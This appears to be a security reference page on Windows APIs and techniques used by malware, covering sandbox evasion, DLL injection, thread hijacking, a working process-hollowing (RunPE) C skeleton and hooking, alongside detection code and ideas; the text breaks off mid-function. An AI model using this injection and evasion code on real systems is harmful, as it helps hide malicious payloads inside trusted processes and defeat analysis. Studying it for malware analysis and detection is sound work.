Common APIs used in Malware


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Generic

Networking

| Raw Sockets   | WinAPI Sockets |
|---------------|----------------|
| socket()      | WSAStartup()   |
| bind()        | bind()         |
| listen()      | listen()       |
| accept()      | accept()       |
| connect()     | connect()      |
| read()/recv() | recv()         |
| write()       | send()         |
| shutdown()    | WSACleanup()   |

TLS pinning and chunked transport

Many loaders wrap their TCP stream in SslStream and pin the server's leaf certificate against a copy embedded in the binary (certificate pinning). Bot information and tasks are compressed (e.g. GZip). When a response exceeds a threshold (~1 MB), the data is fragmented into small pieces (e.g. 16 KB segments) to evade size-based heuristics and to reduce memory spikes during deserialization.
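The following C is an added example of the two transport behaviours described above; it is not code from the page or from any loader. It shows the pin check (byte-for-byte comparison of the presented leaf certificate against the embedded copy, done in constant time) and the size-threshold fragmentation with a receiver that re-assembles the frames and rejects a truncated stream. The 4-byte little-endian length prefix, the constructed certificate bytes and the omission of GZip (no zlib dependency) are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

#define CHUNK_THRESHOLD (1024u * 1024u)   /* ~1 MB: responses above this are fragmented */
#define CHUNK_SIZE      (16u * 1024u)     /* 16 KB segments */

/* Pin check: the presented leaf certificate (DER bytes) must equal the embedded copy.
 * Constant-time compare so the check itself does not leak where the mismatch is. */
int pin_matches(const uint8_t *presented, size_t plen, const uint8_t *embedded, size_t elen) {
    if (plen != elen) return 0;
    uint8_t diff = 0;
    for (size_t i = 0; i < plen; i++) diff |= presented[i] ^ embedded[i];
    return diff == 0;
}

/* How many frames the sender emits for a body of `len` bytes. */
size_t frame_count(size_t len) {
    return len <= CHUNK_THRESHOLD ? 1 : (len + CHUNK_SIZE - 1) / CHUNK_SIZE;
}

/* Framing assumed by this example: each frame is a 4-byte little-endian length followed
 * by the bytes. Returns total bytes written to `out`, or 0 if `outcap` is too small. */
size_t frame_payload(const uint8_t *body, size_t len, uint8_t *out, size_t outcap) {
    size_t n = frame_count(len), seg = n == 1 ? len : CHUNK_SIZE, off = 0, pos = 0;
    for (size_t i = 0; i < n; i++) {
        size_t take = len - off < seg ? len - off : seg;
        if (outcap - pos < 4 + take) return 0;
        out[pos++] = (uint8_t)take; out[pos++] = (uint8_t)(take >> 8);
        out[pos++] = (uint8_t)(take >> 16); out[pos++] = (uint8_t)(take >> 24);
        memcpy(out + pos, body + off, take);
        pos += take; off += take;
    }
    return pos;
}

/* Receiver: walk the frames and reassemble with bounds checks on every length field.
 * Returns the reassembled length, or 0 for a malformed/truncated stream. */
size_t reassemble(const uint8_t *wire, size_t wlen, uint8_t *out, size_t outcap) {
    size_t pos = 0, total = 0;
    while (pos < wlen) {
        if (wlen - pos < 4) return 0;
        size_t take = (size_t)wire[pos] | (size_t)wire[pos + 1] << 8 |
                      (size_t)wire[pos + 2] << 16 | (size_t)wire[pos + 3] << 24;
        pos += 4;
        if (take > wlen - pos || take > outcap - total) return 0;   /* length field lies */
        memcpy(out + total, wire + pos, take);
        pos += take; total += take;
    }
    return total;
}

/* Constructed stand-in for the embedded leaf certificate (a few DER-looking bytes, not a real cert). */
static const uint8_t EMBEDDED_LEAF[] = { 0x30, 0x82, 0x01, 0x0a, 0x30, 0x82, 0x00, 0xf2 };

/* Simulate the handshake callback: 1 if the server presented exactly the pinned cert. */
int demo_pin(int tamper_last_byte) {
    uint8_t presented[sizeof EMBEDDED_LEAF];
    memcpy(presented, EMBEDDED_LEAF, sizeof presented);
    if (tamper_last_byte) presented[sizeof presented - 1] ^= 1;
    return pin_matches(presented, sizeof presented, EMBEDDED_LEAF, sizeof EMBEDDED_LEAF);
}

/* Round trip over a constructed body of `len` pseudo-random bytes; 1 if identical. */
int demo_roundtrip(size_t len) {
    size_t n = frame_count(len), wcap = len + 4 * n;
    uint8_t *body = malloc(len + 1), *wire = malloc(wcap + 1), *back = malloc(len + 1);
    if (!body || !wire || !back) { free(body); free(wire); free(back); return 0; }
    for (size_t i = 0; i < len; i++) body[i] = (uint8_t)(i * 31 + 7);
    size_t wlen = frame_payload(body, len, wire, wcap);
    size_t blen = reassemble(wire, wlen, back, len);
    int ok = wlen != 0 && blen == len && memcmp(body, back, len) == 0;
    free(body); free(wire); free(back);
    return ok;
}

/* Truncated stream: the frame's length field promises 5 bytes but only 4 arrive. */
int demo_truncated(void) {
    uint8_t wire[8] = { 5, 0, 0, 0, 'a', 'b', 'c', 'd' }, out[16];
    return reassemble(wire, sizeof wire, out, sizeof out) == 0;
}

int main(void) {
    printf("pin ok=%d tampered=%d frames(2MB)=%zu roundtrip=%d truncated rejected=%d\n",
           demo_pin(0), demo_pin(1), frame_count(2u << 20),
           demo_roundtrip((2u << 20) + 5), demo_truncated());
    return 0;
}
```

A 2 MB body crosses the threshold and becomes 128 frames of 16 KB (129 when a few bytes spill over); anything at or below 1 MB travels as a single frame, which is why a size-based rule that only fires on large single reads misses it.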

Persistence

| Registry         | File          | Service                      |
|------------------|---------------|------------------------------|
| RegCreateKeyEx() | GetTempPath() | OpenSCManager()              |
| RegOpenKeyEx()   | CopyFile()    | CreateService()              |
| RegSetValueEx()  | CreateFile()  | StartServiceCtrlDispatcher() |
| RegDeleteKeyEx() | WriteFile()   |                              |
| RegGetValue()    | ReadFile()    |                              |

Encryption

WinCrypt (CryptoAPI):

  • CryptAcquireContext()
  • CryptGenKey()
  • CryptDeriveKey()
  • CryptDecrypt()
  • CryptReleaseContext()

Anti-Analysis/VM

| Function name                                                  | Assembly instructions |
|----------------------------------------------------------------|-----------------------|
| IsDebuggerPresent()                                            | CPUID                 |
| GetSystemInfo()                                                | IN                    |
| GlobalMemoryStatusEx()                                         |                       |
| GetVersion()                                                   |                       |
| CreateToolhelp32Snapshot [check whether a process is running]  |                       |
| CreateFileW/A [check whether a file exists]                    |                       |

Emulator API fingerprinting & sleep evasion

Malware often fingerprints sandbox emulators by looking for Defender's virtualised exports (seen in the Malware Protection Emulator). If any of these symbols is present (case-insensitive scan of the process), execution is delayed for 10–30 minutes and the check is repeated, so that the analysis time budget is exhausted before anything interesting runs.

Examples of API names used as canaries:

  • MpVmp32Entry, MpVmp32FastEnter, MpCallPreEntryPointCode, MpCallPostEntryPointCode, MpFinalize, MpReportEvent*, MpSwitchToNextThread*
  • VFS_* family: VFS_Open, VFS_Read, VFS_MapViewOfFile, VFS_UnmapViewOfFile, VFS_FindFirstFile/FindNextFile, VFS_CopyFile, VFS_DeleteFile, VFS_MoveFile
  • ThrdMgr_*: ThrdMgr_GetCurrentThreadHandle, ThrdMgr_SaveTEB, ThrdMgr_SwitchThreads

Typical delay primitive (user-land):

```cmd
cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul
```

%RANDOM_IN_[600,1800]% is a placeholder for a value the loader picks between 600 and 1800 seconds (10–30 minutes); a single timeout call of that length keeps the process alive but idle for longer than most sandboxes wait.
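As an added example (not code from the page or from any loader), the following C performs the canary scan described above over a raw memory buffer: a case-insensitive search for the listed export-name prefixes, followed by the 600–1800 s delay decision. The buffers are constructed stand-ins for an export directory; the list of prefixes is taken from the page, and the deterministic random source is an assumption made so the result can be checked.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Export-name prefixes the page lists as emulator canaries, matched case-insensitively,
 * because the loader described above scans the process that way. */
static const char *const CANARY_PREFIXES[] = {
    "MpVmp32", "MpCallPreEntryPointCode", "MpCallPostEntryPointCode", "MpFinalize",
    "MpReportEvent", "MpSwitchToNextThread", "VFS_", "ThrdMgr_"
};
#define N_CANARIES (sizeof(CANARY_PREFIXES) / sizeof(CANARY_PREFIXES[0]))

/* Case-insensitive search for `needle` anywhere in a raw, possibly NUL-containing buffer
 * (e.g. a dumped export directory or a memory region). Returns the offset or -1. */
long find_ci(const unsigned char *hay, size_t hlen, const char *needle) {
    size_t nlen = strlen(needle);
    if (nlen == 0 || hlen < nlen) return -1;
    for (size_t i = 0; i + nlen <= hlen; i++) {
        size_t k = 0;
        while (k < nlen && tolower(hay[i + k]) == tolower((unsigned char)needle[k])) k++;
        if (k == nlen) return (long)i;
    }
    return -1;
}

/* Index of the first canary prefix found in the buffer, or -1 if the process looks
 * "real" (no emulator exports visible). */
int buffer_has_canary(const unsigned char *buf, size_t len) {
    for (size_t c = 0; c < N_CANARIES; c++)
        if (find_ci(buf, len, CANARY_PREFIXES[c]) >= 0) return (int)c;
    return -1;
}

/* The loader's decision: sleep 600-1800 s (10-30 min) when a canary is present, else 0.
 * The random value is passed in so the mapping is deterministic and testable. */
unsigned delay_seconds(int canary_index, unsigned rnd) {
    return canary_index >= 0 ? 600u + rnd % 1201u : 0u;
}

/* Constructed samples (not real memory dumps): NUL-separated export names as an
 * export directory would hold them. */
static const unsigned char CLEAN_EXPORTS[] =
    "CreateFileW\0ReadFile\0WriteFile\0VirtualAlloc\0GetProcAddress\0";
static const unsigned char EMULATED_EXPORTS[] =
    "CreateFileW\0vfs_open\0MPVMP32ENTRY\0ThrdMgr_SwitchThreads\0";

int demo_clean(void)    { return buffer_has_canary(CLEAN_EXPORTS, sizeof CLEAN_EXPORTS); }
int demo_emulated(void) { return buffer_has_canary(EMULATED_EXPORTS, sizeof EMULATED_EXPORTS); }

int main(void) {
    int c = demo_emulated();
    printf("clean: %d, emulated: %d (%s), delay: %u s\n", demo_clean(), c,
           c >= 0 ? CANARY_PREFIXES[c] : "-", delay_seconds(c, 12345));
    return 0;
}
```

The scan is deliberately byte-oriented rather than string-based: export tables and memory regions contain NUL bytes, so a strstr-style search would stop at the first name.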

Argument gating

  • Operators sometimes require a harmless-looking CLI switch to be present before the payload runs (e.g. /i:--type=renderer to mimic Chromium child processes). If the switch is absent, the loader exits immediately, which defeats naive sandbox execution (the sample is detonated without its arguments).

Stealth

| Name                     | Purpose                                                                |
|--------------------------|------------------------------------------------------------------------|
| VirtualAlloc             | Allocate memory (packers)                                              |
| VirtualProtect           | Change memory permissions (a packer making a section executable)       |
| ReadProcessMemory        | Injection into external processes                                      |
| WriteProcessMemoryA/W    | Injection into external processes                                      |
| NtWriteVirtualMemory     |                                                                        |
| CreateRemoteThread       | DLL/process injection...                                               |
| NtUnmapViewOfSection     |                                                                        |
| QueueUserAPC             |                                                                        |
| CreateProcessInternalA/W |                                                                        |

Execution

Function name:

  • CreateProcessA/W
  • ShellExecute
  • WinExec
  • ResumeThread
  • NtResumeThread

Miscellaneous

  • GetAsyncKeyState() -- Keylogging
  • SetWindowsHookEx -- Keylogging
  • GetForegroundWindow -- Get the name of the active window (or the website from a browser)
  • LoadLibrary() -- Load a library
  • GetProcAddress() -- Find a procedure's address
  • CreateToolhelp32Snapshot() -- List running processes
  • GetDC() -- Screenshot
  • BitBlt() -- Screenshot
  • InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Internet access
  • FindResource(), LoadResource(), LockResource() -- Access resources embedded in the executable

Malware Techniques

DLL Injection

Execute an arbitrary DLL inside another process

  1. Locate the process to inject the malicious DLL into: CreateToolhelp32Snapshot, Process32First, Process32Next
  2. Open the process and resolve the address of LoadLibraryA (kernel32.dll is mapped at the same base in every process of the same bitness within a boot session, so the local address is valid remotely): OpenProcess, GetModuleHandle, GetProcAddress
  3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
  4. Create a thread in the process whose start routine is LoadLibrary and whose argument is that path, so it loads the malicious DLL: CreateRemoteThread, LoadLibrary

Other functions to use: NtCreateThreadEx, RtlCreateUserThread

Reflective DLL Injection

Load a malicious DLL without going through the Windows loader (no LoadLibrary call, so the module never appears in the loader's module list).
The DLL is mapped into the process by a small loader stub it carries itself, which then resolves the import addresses, applies the relocations and calls the DllMain function.

Thread Hijacking

Find a thread of a process and make it load a malicious DLL

  1. Find a target thread: CreateToolhelp32Snapshot, Thread32First, Thread32Next
  2. Open the thread: OpenThread
  3. Suspend the thread: SuspendThread
  4. Write the path to the malicious DLL inside the victim process: VirtualAllocEx, WriteProcessMemory
  5. Redirect the thread so that its next instruction is LoadLibrary with that path as argument: GetThreadContext, SetThreadContext
  6. Resume the thread, which loads the library: ResumeThread

PE Injection

Portable Executable injection: the executable is written into the memory of the victim process and executed from there.

Process Hollowing (a.k.a RunPE)

Process Hollowing is one of the favourite defence-evasion / execution tricks used by Windows malware. The idea is to launch a legitimate process in the suspended state, remove (hollow) its original image from memory and copy an arbitrary PE in its place. When the primary thread is finally resumed the malicious entry-point executes under the guise of a trusted binary (often signed by Microsoft).

Typical workflow:

  1. Spawn a benign host (e.g. RegAsm.exe, rundll32.exe, msbuild.exe) suspended so that no instructions run yet.

```c
STARTUPINFOA  si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
               NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
```

  2. Read the malicious payload into memory and parse its PE headers to obtain SizeOfImage, the section table and the new EntryPoint.
  3. NtUnmapViewOfSection / ZwUnmapViewOfSection – unmap the original image base from the suspended process.
  4. VirtualAllocEx – reserve SizeOfImage bytes of RWX memory inside the remote process, ideally at the payload's preferred ImageBase (otherwise relocations have to be applied).
  5. WriteProcessMemory – copy the headers first, then walk the sections and copy each one's raw data to its virtual address.
  6. SetThreadContext – patch the context so the thread starts at the payload's EntryPoint: in a freshly created suspended process EAX (RCX on x64) holds the entry point passed to the thread start routine, so overwrite it, or set EIP/RIP directly.
  7. ResumeThread – the thread continues and executes the attacker-supplied code.

Minimal proof-of-concept (x86) skeleton:

```c
#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtUnmapViewOfSection_t)(HANDLE ProcessHandle, PVOID BaseAddress);

// x86-only skeleton; assumes the payload can be mapped at its preferred ImageBase (no relocations applied).
void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){
    // 0. parse the in-memory payload's PE headers
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)payload;
    PIMAGE_NT_HEADERS pHdr = (PIMAGE_NT_HEADERS)((BYTE*)payload + pDos->e_lfanew);
    PIMAGE_SECTION_HEADER pSec = IMAGE_FIRST_SECTION(pHdr);
    if(payloadSize < pDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) || pHdr->Signature != IMAGE_NT_SIGNATURE) return;

    // 1. create suspended process
    STARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi = {0};
    if(!CreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi)) return;

    // 2. read remote PEB to get ImageBaseAddress (x86: EBX of the suspended thread = PEB, ImageBaseAddress at PEB+8)
    CONTEXT ctx = {0}; ctx.ContextFlags = CONTEXT_FULL;
    GetThreadContext(pi.hThread,&ctx);
    PVOID baseAddr = NULL;
    ReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,sizeof(baseAddr),NULL);

    // 3. unmap original image & allocate the new region at the payload's preferred base
    NtUnmapViewOfSection_t pNtUnmapViewOfSection = (NtUnmapViewOfSection_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"),"NtUnmapViewOfSection");
    pNtUnmapViewOfSection(pi.hProcess,baseAddr);
    PVOID newBase = VirtualAllocEx(pi.hProcess,(PVOID)pHdr->OptionalHeader.ImageBase,
                                   pHdr->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if(!newBase){ TerminateProcess(pi.hProcess,1); return; }   // base taken: a real loader would relocate

    // 4. copy headers, 5. copy each section's raw data to its virtual address
    WriteProcessMemory(pi.hProcess,newBase,payload,pHdr->OptionalHeader.SizeOfHeaders,NULL);
    for(WORD i=0;i<pHdr->FileHeader.NumberOfSections;i++)
        WriteProcessMemory(pi.hProcess,(BYTE*)newBase+pSec[i].VirtualAddress,
                           (BYTE*)payload+pSec[i].PointerToRawData,pSec[i].SizeOfRawData,NULL);

    // 6. publish the new image base in the PEB and point EAX at the payload's entry point
    WriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&newBase,sizeof(newBase),NULL);
    ctx.Eax = (DWORD)(ULONG_PTR)newBase + pHdr->OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(pi.hThread,&ctx);
    // 7. run!
    ResumeThread(pi.hThread);
}
```
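The skeleton above only builds on Windows. The following portable C is an added example (not code from the page, the DarkCloud campaign or any loader) that implements step 2 of the workflow, parsing a PE32 image with bounds checks, and turns steps 4–5 into an explicit copy plan: the headers first, then each section's raw data to its RVA, which is exactly the list of WriteProcessMemory calls the loader issues. The image it parses is a constructed 0x600-byte PE32 with a .text and a .data section, not a real binary, and the struct layouts cover only the fields used here; both are assumptions of the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t rest[58]; uint32_t e_lfanew; } dos_hdr_t;      /* 64 bytes */
typedef struct { uint32_t Signature; uint16_t Machine, NumberOfSections; uint32_t ts, symptr, nsyms;
                 uint16_t SizeOfOptionalHeader, Characteristics; } nt_file_hdr_t;          /* 24 bytes */
typedef struct { uint16_t Magic; uint8_t lnk[2]; uint32_t code, idata, udata, AddressOfEntryPoint,
                 BaseOfCode, BaseOfData, ImageBase, SectionAlignment, FileAlignment; uint8_t ver[16];
                 uint32_t SizeOfImage, SizeOfHeaders; } opt32_t;                            /* first 64 bytes */
typedef struct { char Name[8]; uint32_t VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData;
                 uint8_t rest[16]; } sec_hdr_t;                                           /* 40 bytes */
#pragma pack(pop)

typedef struct { uint32_t dst_rva, src_off, size; } copy_op_t;   /* one WriteProcessMemory call */
typedef struct { uint32_t size_of_image, size_of_headers, entry_rva, image_base; uint16_t nsec;
                 const sec_hdr_t *sec; } pe_info_t;

/* Step 2: parse the payload's headers with bounds checks. Returns 1 on success, 0 on a bad image. */
int parse_pe32(const uint8_t *buf, size_t len, pe_info_t *out) {
    if (len < sizeof(dos_hdr_t)) return 0;
    const dos_hdr_t *dos = (const dos_hdr_t *)buf;
    if (dos->e_magic != 0x5A4D) return 0;                                   /* "MZ" */
    size_t nt = dos->e_lfanew;
    if (nt > len || len - nt < sizeof(nt_file_hdr_t) + sizeof(opt32_t)) return 0;
    const nt_file_hdr_t *fh = (const nt_file_hdr_t *)(buf + nt);
    const opt32_t *opt = (const opt32_t *)(buf + nt + sizeof(nt_file_hdr_t));
    if (fh->Signature != 0x00004550 || opt->Magic != 0x10B) return 0;       /* "PE\0\0", PE32 */
    size_t secoff = nt + sizeof(nt_file_hdr_t) + fh->SizeOfOptionalHeader;
    if (secoff > len || (len - secoff) / sizeof(sec_hdr_t) < fh->NumberOfSections) return 0;
    out->size_of_image = opt->SizeOfImage; out->size_of_headers = opt->SizeOfHeaders;
    out->entry_rva = opt->AddressOfEntryPoint; out->image_base = opt->ImageBase;
    out->nsec = fh->NumberOfSections; out->sec = (const sec_hdr_t *)(buf + secoff);
    return 1;
}

/* Steps 4-5: the copies a loader performs, headers first, then every section with raw data.
 * Returns the number of ops, or -1 if a section would read past the file or write past SizeOfImage. */
int plan_copies(const pe_info_t *pe, size_t file_len, copy_op_t *ops, size_t cap) {
    size_t n = 0;
    if (cap == 0 || pe->size_of_headers > file_len || pe->size_of_headers > pe->size_of_image) return -1;
    ops[n++] = (copy_op_t){0, 0, pe->size_of_headers};
    for (uint16_t i = 0; i < pe->nsec; i++) {
        const sec_hdr_t *s = &pe->sec[i];
        if (s->SizeOfRawData == 0) continue;                                /* e.g. .bss: nothing to copy */
        if ((uint64_t)s->PointerToRawData + s->SizeOfRawData > file_len ||
            (uint64_t)s->VirtualAddress + s->SizeOfRawData > pe->size_of_image || n == cap) return -1;
        ops[n++] = (copy_op_t){s->VirtualAddress, s->PointerToRawData, s->SizeOfRawData};
    }
    return (int)n;
}

/* Constructed sample (not a real binary): a 0x600-byte PE32 with .text at RVA 0x1000 and .data at 0x2000. */
#define SAMPLE_LEN 0x600
void build_sample_pe(uint8_t *buf) {
    memset(buf, 0, SAMPLE_LEN);
    dos_hdr_t *dos = (dos_hdr_t *)buf; dos->e_magic = 0x5A4D; dos->e_lfanew = 0x40;
    nt_file_hdr_t *fh = (nt_file_hdr_t *)(buf + 0x40);
    fh->Signature = 0x00004550; fh->Machine = 0x14C; fh->NumberOfSections = 2; fh->SizeOfOptionalHeader = 0xE0;
    opt32_t *opt = (opt32_t *)(buf + 0x40 + sizeof(nt_file_hdr_t));
    opt->Magic = 0x10B; opt->AddressOfEntryPoint = 0x1000; opt->ImageBase = 0x400000;
    opt->SectionAlignment = 0x1000; opt->FileAlignment = 0x200; opt->SizeOfImage = 0x3000; opt->SizeOfHeaders = 0x200;
    sec_hdr_t *sec = (sec_hdr_t *)(buf + 0x40 + sizeof(nt_file_hdr_t) + 0xE0);
    sec[0] = (sec_hdr_t){".text", 0x100, 0x1000, 0x200, 0x200, {0}};
    sec[1] = (sec_hdr_t){".data", 0x80, 0x2000, 0x200, 0x400, {0}};
    buf[0x200] = 0xCC;                                                       /* first byte of .text */
}

/* Plan the sample as if the file were `pretend_len` bytes long (a smaller value simulates truncation). */
int demo_sample(size_t pretend_len) {
    uint8_t buf[SAMPLE_LEN]; pe_info_t pe; copy_op_t ops[8];
    build_sample_pe(buf);
    if (!parse_pe32(buf, SAMPLE_LEN, &pe)) return -2;
    return plan_copies(&pe, pretend_len, ops, 8);
}

/* Overwrite the MZ signature: the parser must refuse the image. */
int demo_corrupt(void) {
    uint8_t buf[SAMPLE_LEN]; pe_info_t pe;
    build_sample_pe(buf); buf[0] = 'X';
    return parse_pe32(buf, SAMPLE_LEN, &pe);
}

int main(void) {
    uint8_t buf[SAMPLE_LEN]; pe_info_t pe; copy_op_t ops[8];
    build_sample_pe(buf);
    if (!parse_pe32(buf, SAMPLE_LEN, &pe)) return 1;
    int n = plan_copies(&pe, SAMPLE_LEN, ops, 8);
    printf("SizeOfImage=0x%x EntryPoint=0x%x ImageBase=0x%x, %d copy ops\n",
           pe.size_of_image, pe.entry_rva, pe.image_base, n);
    for (int i = 0; i < n; i++)
        printf("  WriteProcessMemory(newBase+0x%x, file+0x%x, 0x%x)\n", ops[i].dst_rva, ops[i].src_off, ops[i].size);
    return 0;
}
```

The bounds checks are the part the page's skeleton lacks: a loader that trusts PointerToRawData and SizeOfRawData from the payload will read past its own buffer on a truncated or hostile image, which is the same defect that makes naive RunPE implementations crash on packed samples.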

Practical notes observed in the DarkCloud Stealer campaign:

  • The loader picked RegAsm.exe (part of the .NET Framework) as host – a signed binary unlikely to draw attention.
  • The decrypted VB6 stealer (holographies.exe) is not dropped on disk; it only ever exists inside the hollowed process making static detection harder.
  • Sensitive strings (regexes, paths, Telegram credentials) are RC4-encrypted per-string and only decrypted at runtime, further complicating memory scanning.

Detection ideas:

  • Alert on processes created with CREATE_SUSPENDED that never create a GUI/console window before a memory region is allocated RWX inside them (rare for benign code).
  • Look for the call sequence NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory issued by one process against a different process.
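The two detection ideas as a small state machine over API telemetry, added here as an example (not code from the page or from any product). It tracks each (caller, target) pair, advances on a suspended create or a remote NtUnmapViewOfSection, then on an RWX VirtualAllocEx into a target that has not shown a window, and alerts on the following WriteProcessMemory. The event layout, the pids, the three traces and the choice of CreateWindowExW/AllocConsole as the "showed UI" signal are constructed assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define CREATE_SUSPENDED_FLAG     0x00000004u   /* CreateProcess dwCreationFlags */
#define PAGE_EXECUTE_READWRITE_V  0x40u         /* VirtualAllocEx flProtect */
#define MAX_TRACKED 32

/* One telemetry record: which process called which API against which target, plus the one
 * argument the rules care about (creation flags for CreateProcess, protection for VirtualAllocEx). */
typedef struct { uint32_t caller, target; const char *api; uint32_t arg; } api_event_t;

enum { ST_NONE, ST_SUSPENDED, ST_UNMAPPED, ST_RWX };
typedef struct { uint32_t caller, target; int stage, target_has_window; } track_t;

static track_t *track(track_t *t, size_t *n, uint32_t caller, uint32_t target) {
    for (size_t i = 0; i < *n; i++)
        if (t[i].caller == caller && t[i].target == target) return &t[i];
    if (*n == MAX_TRACKED) return NULL;
    t[*n] = (track_t){caller, target, ST_NONE, 0};
    return &t[(*n)++];
}

/* Walks the events in order. Returns the pid of the first target that went through
 * suspended create / remote unmap -> RWX VirtualAllocEx -> WriteProcessMemory without
 * having shown a window; 0 when nothing matched. */
uint32_t detect_hollowing(const api_event_t *ev, size_t n) {
    track_t tracked[MAX_TRACKED]; size_t nt = 0;
    for (size_t i = 0; i < n; i++) {
        const api_event_t *e = &ev[i];
        if (!strcmp(e->api, "CreateWindowExW") || !strcmp(e->api, "AllocConsole")) {
            for (size_t j = 0; j < nt; j++)                 /* the child showed UI: lower suspicion */
                if (tracked[j].target == e->caller) tracked[j].target_has_window = 1;
            continue;
        }
        if (e->caller == e->target) continue;               /* rules only concern cross-process calls */
        track_t *t = track(tracked, &nt, e->caller, e->target);
        if (!t) continue;
        if (!strcmp(e->api, "CreateProcessW") && (e->arg & CREATE_SUSPENDED_FLAG))
            t->stage = ST_SUSPENDED;
        else if (!strcmp(e->api, "NtUnmapViewOfSection"))
            t->stage = ST_UNMAPPED;                         /* a remote unmap is suspicious on its own */
        else if (t->stage == ST_UNMAPPED && !strcmp(e->api, "VirtualAllocEx") &&
                 e->arg == PAGE_EXECUTE_READWRITE_V && !t->target_has_window)
            t->stage = ST_RWX;
        else if (t->stage == ST_RWX && !strcmp(e->api, "WriteProcessMemory"))
            return t->target;
    }
    return 0;
}

/* Constructed traces (not real telemetry). pid 100 hollows its child 200; pid 300 is a
 * debugger-style injector writing RW memory into child 400, which has shown a window;
 * pid 500 unmaps child 600 but the child shows a window before the RWX allocation. */
static const api_event_t HOLLOWING_TRACE[] = {
    {100, 200, "CreateProcessW", CREATE_SUSPENDED_FLAG}, {100, 200, "NtUnmapViewOfSection", 0},
    {100, 200, "VirtualAllocEx", PAGE_EXECUTE_READWRITE_V}, {100, 200, "WriteProcessMemory", 0},
    {100, 200, "SetThreadContext", 0}, {100, 200, "ResumeThread", 0},
};
static const api_event_t BENIGN_TRACE[] = {
    {300, 400, "CreateProcessW", CREATE_SUSPENDED_FLAG}, {300, 400, "ResumeThread", 0},
    {400, 400, "CreateWindowExW", 0}, {300, 400, "VirtualAllocEx", 0x04u /* PAGE_READWRITE */},
    {300, 400, "WriteProcessMemory", 0},
};
static const api_event_t WINDOWED_TRACE[] = {
    {500, 600, "CreateProcessW", CREATE_SUSPENDED_FLAG}, {500, 600, "NtUnmapViewOfSection", 0},
    {600, 600, "CreateWindowExW", 0}, {500, 600, "VirtualAllocEx", PAGE_EXECUTE_READWRITE_V},
    {500, 600, "WriteProcessMemory", 0},
};
#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

uint32_t demo_hollowing(void) { return detect_hollowing(HOLLOWING_TRACE, COUNT(HOLLOWING_TRACE)); }
uint32_t demo_benign(void)    { return detect_hollowing(BENIGN_TRACE, COUNT(BENIGN_TRACE)); }
uint32_t demo_windowed(void)  { return detect_hollowing(WINDOWED_TRACE, COUNT(WINDOWED_TRACE)); }

int main(void) {
    printf("hollowing trace -> pid %u, benign -> %u, windowed -> %u\n",
           demo_hollowing(), demo_benign(), demo_windowed());
    return 0;
}
```

The RW-only injector in the benign trace never fires because it neither unmaps nor allocates RWX, and the windowed trace shows why the "no window before RWX" qualifier matters: it keeps ordinary UI automation and debuggers out of the alert.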

Hooking

  • The SSDT (System Service Descriptor Table) points to kernel functions (ntoskrnl.exe) or to the GUI driver (win32k.sys) so that user-mode system calls are dispatched to them.
  • A rootkit may modify these pointers to addresses it controls.
  • IRPs (I/O Request Packets) carry data from one component to another. Almost everything in the kernel uses IRPs, and each driver object has its own dispatch table (MajorFunction) that can be hooked; patching such kernel structures directly is DKOM (Direct Kernel Object Manipulation).
  • The IAT (Import Address Table) is used to resolve dependencies. It's possible to hook this table in order to hijack the code that will be called.
  • EAT (Export Address Table) hooks. These hooks can be done from user-land. The goal is to hook functions exported by DLLs.
  • Inline hooks: these are harder to achieve. They involve modifying the code of the function itself, for example by placing a jump to the hook at its beginning.
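As an added example of the IAT-hooking idea above (not code from the page or from any rootkit), the following portable C simulates an import table as an array of name/pointer slots that the program calls through, then swaps one slot for a hook that logs, filters and forwards to the saved original. The table, the two stand-in imports and their return values are constructed assumptions; in a real PE the IAT is located through the import directory and is read-only, so it has to be made writable (VirtualProtect) before the slot is overwritten.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef int (*import_fn)(int);
typedef struct { const char *name; import_fn fn; } iat_entry_t;   /* one IAT slot: name -> resolved address */

/* Stand-ins for two imported functions the "program" calls through its IAT. */
static int imp_open(int handle)  { return handle * 2; }
static int imp_close(int handle) { return handle - 1; }

/* The simulated IAT, filled in the way the loader would after resolving imports. */
static iat_entry_t g_iat[] = { {"OpenThing", imp_open}, {"CloseThing", imp_close} };
#define IAT_LEN (sizeof g_iat / sizeof g_iat[0])

/* Compiled code calls imports indirectly through the slot, so swapping the slot hijacks every call. */
int program_call(const char *name, int arg) {
    for (size_t i = 0; i < IAT_LEN; i++)
        if (strcmp(g_iat[i].name, name) == 0) return g_iat[i].fn(arg);
    return -999;                                                   /* unresolved import */
}

/* Replace the slot for `name`, saving the original so the hook can forward. 1 on success. */
int hook_import(iat_entry_t *iat, size_t n, const char *name, import_fn hook, import_fn *saved) {
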